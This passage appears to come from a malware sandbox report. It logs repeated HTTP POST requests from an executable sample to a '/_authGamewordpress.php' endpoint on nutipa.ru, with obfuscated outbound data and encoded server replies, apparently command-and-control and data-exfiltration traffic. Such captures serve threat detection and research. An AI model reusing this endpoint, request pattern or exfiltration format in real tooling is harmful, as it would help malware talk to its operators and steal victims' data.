                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGKLg73rRG%2Br2eYRcsPegzZg0wxAR1jiOUnJaK156llHQOBCP9XHhRLllz0HvjbwXRYCPUURdUVQXznihk3qn0jiW0LV3W0wVIm11nKWXKRiXHIxSI0ihrYPIZs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b41a8275e64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4017&min_rtt=1733&rtt_var=5218&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=72981&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            42 | 192.168.2.4 | 49806 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:17.208121061 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:17.560520887 CET | 2536 | OUT | Data Raw: 55 50 46 5c 5a 5c 58 50 5d 5a 56 51 50 5b 57 5a 55 53 5e 41 5a 55 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPF\Z\XP]ZVQP[WZUS^AZU[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$])=?*#"A+37<<\%:Y1W)#$3X== )U/;.F'#P +
                                                            Dec 15, 2024 19:37:18.294855118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:18.565634966 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9xChwxRILU1Tvcx1euuEaT8E1qVpqkkRnLMPV%2FftGcdyB2al7CpzfdTeqWJ5J16%2FpztPbhyEAwWLMWojl7PqKVfYtR5Sa%2F3IGhRANnF0ShI3Gq4y1ASYJP8%2FV4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b4c6e764205-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3834&min_rtt=1714&rtt_var=4883&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=78171&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            43 | 192.168.2.4 | 49807 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:17.775669098 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:18.123042107 CET | 1420 | OUT | Data Raw: 55 52 43 5d 5f 5e 58 54 5d 5a 56 51 50 5a 57 52 55 5c 5e 40 5a 52 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: URC]_^XT]ZVQPZWRU\^@ZR[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]([):7"*<7!?8X2-"&>* <0:X(#68+.F'#P /
                                                            Dec 15, 2024 19:37:18.885478973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:19.129477978 CET | 939 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRwDmc3BYJMGCP%2FU4v3r8wNLgqh8pgCizmsZxmb7n9MRp1njCrnydyjXHVLL59imWNrYGPEAS4y9F0AO%2B3gC1XriSRe76QmeMnIniA%2BSnIycwiBZQtD2Aw5wONY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b500e5a0f68-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9964&min_rtt=5434&rtt_var=11098&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=35030&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 35 14 2a 1e 34 00 3f 0b 2e 3c 03 1b 29 30 20 41 26 32 2d 1d 33 38 2c 07 29 13 01 1f 32 17 3d 11 23 0b 35 50 3c 09 21 12 24 36 21 51 03 11 21 00 25 00 3f 03 3d 39 06 19 32 1f 2b 14 25 13 2c 5f 3f 06 08 57 27 3b 3f 1e 20 3e 27 09 2e 14 02 1f 3c 2a 2b 16 2f 3e 36 1d 20 1c 2e 53 0c 17 25 1e 2b 07 2a 5f 23 32 17 51 30 2f 23 54 34 39 03 0c 3d 20 3f 0d 24 33 05 53 33 00 20 1a 20 33 25 52 31 03 36 13 34 32 00 50 2a 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a
                                                            Data Ascii: 98:5*4?.<)0 A&2-38,)2=#5P<!$6!Q!%?=92+%,_?W';? >'.<*+/>6 .S%+*_#2Q0/#T49= ?$3S3 3%R1642P*%\ .R4]T
                                                            Dec 15, 2024 19:37:19.321634054 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            44 | 192.168.2.4 | 49808 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:18.809355021 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:19.154647112 CET | 2536 | OUT | Data Raw: 50 5e 46 5b 5a 5d 58 53 5d 5a 56 51 50 5b 57 50 55 55 5e 46 5a 50 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P^F[Z]XS]ZVQP[WPUU^FZP[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?&Y);]#?5++4<$'.%*)U 3>%<3R/;.F'#P +
                                                            Dec 15, 2024 19:37:19.897706985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:20.135431051 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JwkqHLNixj2NuQO0mR1HBLwVYzTxaMsZO%2BTMfz%2Faf40VH47KchT4vQLAezKEVrwgbht0OEZDYnveqm8x1%2F1aDVJtOB7K0NIOUXCVEC3nuZnLW6ZAEWkfK28ip%2BM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b566d2a5e64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4664&min_rtt=1688&rtt_var=6585&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=57263&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            45 | 192.168.2.4 | 49809 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:20.787034988 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:21.139128923 CET | 2536 | OUT | Data Raw: 50 53 43 51 5a 5b 58 57 5d 5a 56 51 50 5b 57 57 55 54 5e 41 5a 57 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PSCQZ[XW]ZVQP[WWUT^AZW[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^?2_= ",6E+] 2=:Y&>30..+U&/;.F'#P +
                                                            Dec 15, 2024 19:37:21.874476910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:22.114371061 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqCF%2BD00SJkac9Z52b6lwV4gImMQF6XsuRS7DGi%2FBk68NGRmjOLla4kImVLCoXS%2BAQnuraEIKvrlp49QVuf3i86ZDEMQ5h3Ri7XB80oONGtJ7CvesdPjs6bcL7M%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b62b85042bc-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3939&min_rtt=1749&rtt_var=5036&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=75757&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            46 | 192.168.2.4 | 49810 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:22.369469881 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:22.716738939 CET | 2536 | OUT | Data Raw: 55 50 46 5a 5f 5f 5d 52 5d 5a 56 51 50 5a 57 5b 55 51 5e 49 5a 55 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPFZ__]R]ZVQPZW[UQ^IZU[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[+-2Z>\'Y5*A(-X ?$Y'="X%=<'>)(0%;;.F'#P /
                                                            Dec 15, 2024 19:37:23.494529963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:23.710345030 CET | 789 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFX0EkFzdBl4SKec79b%2B5sIrJiQUFPtmeTIp8d2g6hJpIUkxpcOkeQ0DuVRB346s%2FRNVvhnyaQ%2FI7QzgM6OJc77MevXqtNe4x8vCFSE1J1Cbm6KmYiLQ7W9fywc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b6caf8cf3bb-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8382&min_rtt=1592&rtt_var=14177&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=26111&cwnd=79&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:23.902086020 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            47 | 192.168.2.4 | 49811 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:24.303513050 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:24.654412985 CET | 2536 | OUT | Data Raw: 50 51 43 5d 5f 58 58 51 5d 5a 56 51 50 51 57 5b 55 54 5e 40 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQC]_XXQ]ZVQPQW[UT^@ZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<-.[) "-?4<([1"_2->);'=>_<!,+.F'#P
                                                            Dec 15, 2024 19:37:25.389305115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:25.662014008 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ux7pVJ11ewIlEjjVcr6Vu%2BQYEmqlHQitrN5Rr0OKInD1ITpSDRt2qFf6fprRaWbnzN2ped4uFjIJCS%2F5unsRgmyocRlj8gJxYoVuzVTKEgL5H1F05mibeA6PLy4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b78ba0f4405-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3700&min_rtt=1631&rtt_var=4751&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=80272&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            48 | 192.168.2.4 | 49812 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:24.447607994 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:24.795104980 CET | 1420 | OUT | Data Raw: 55 57 43 51 5f 5b 5d 55 5d 5a 56 51 50 5e 57 5a 55 51 5e 45 5a 56 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCQ_[]U]ZVQP^WZUQ^EZV[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(_=: 6%?;\ 8Y1X2'-!V>[%.&+3%;;.F'#P ?
                                                            Dec 15, 2024 19:37:25.534591913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:25.789246082 CET | 942 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cderPiwB%2FqNWqshS5hdKjb7jtHtA34TNa04cVskjP%2FI2JvnUlp2Rg2zF1H6SPLQ0DwrJ3ot7uDv8no8C8FbtEjanW9Xhio7Sy9Gk7gYYoIKJh8xMna9teX47LVA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b79af3943bf-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7187&min_rtt=1852&rtt_var=11365&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=32782&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 35 39 22 52 20 3e 02 1b 2c 3f 32 0f 2b 30 3f 1a 33 32 39 5a 30 3b 3f 1b 28 3d 2b 52 25 17 03 5e 23 1c 26 08 2b 24 31 5b 24 26 21 51 03 11 22 58 26 10 02 10 2a 5f 37 04 24 21 0d 5a 26 13 38 14 2b 28 35 0f 33 06 27 10 20 3e 37 0f 3a 5c 38 58 2b 03 2f 5a 3a 00 26 55 21 26 2e 53 0c 17 25 1e 2b 17 0c 5b 37 32 17 1e 27 3f 3b 1f 23 17 22 54 3d 55 23 09 30 33 23 54 24 58 38 57 21 33 25 56 24 39 31 03 23 0c 0b 0f 2a 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:59"R >,?2+0?329Z0;?(=+R%^#&+$1[$&!Q"X&*_7$!Z&8+(53' >7:\8X+/Z:&U!&.S%+[72'?;#"T=U#03#T$X8W!3%V$91#*%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            49 | 192.168.2.4 | 49813 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:25.921802044 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:26.279258013 CET | 2536 | OUT | Data Raw: 55 50 46 5b 5a 5b 5d 56 5d 5a 56 51 50 5c 57 56 55 5c 5e 43 5a 5e 5b 5b 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPF[Z[]V]ZVQP\WVU\^CZ^[[\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+)*:!Z:<=3Z44%>'=-W)3\< &;;.F'#P 7
                                                            Dec 15, 2024 19:37:27.012936115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:27.316521883 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mgnhvvmSo5lqHo7%2F0f1Q77PRsTDEnGM5NxrpqZoIvlOtwA2SljmlqHRzARx8%2Bd96JipudeAhR0PT9C5vEJz6vdPwGm27iDuLVZLeVUMpKuD0je2H%2BixJsMEfmA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b82ec0443d3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3881&min_rtt=1671&rtt_var=5047&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=75440&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            50 | 192.168.2.4 | 49814 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:27.568474054 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:27.919883966 CET | 2536 | OUT | Data Raw: 50 52 43 50 5f 5e 58 51 5d 5a 56 51 50 59 57 57 55 5d 5e 42 5a 57 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRCP_^XQ]ZVQPYWWU]^BZW[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]<)=);X6<C+-#7<$Y2-%>=*3Y'"(#*8+.F'#P #
                                                            Dec 15, 2024 19:37:28.671375036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:28.973556042 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
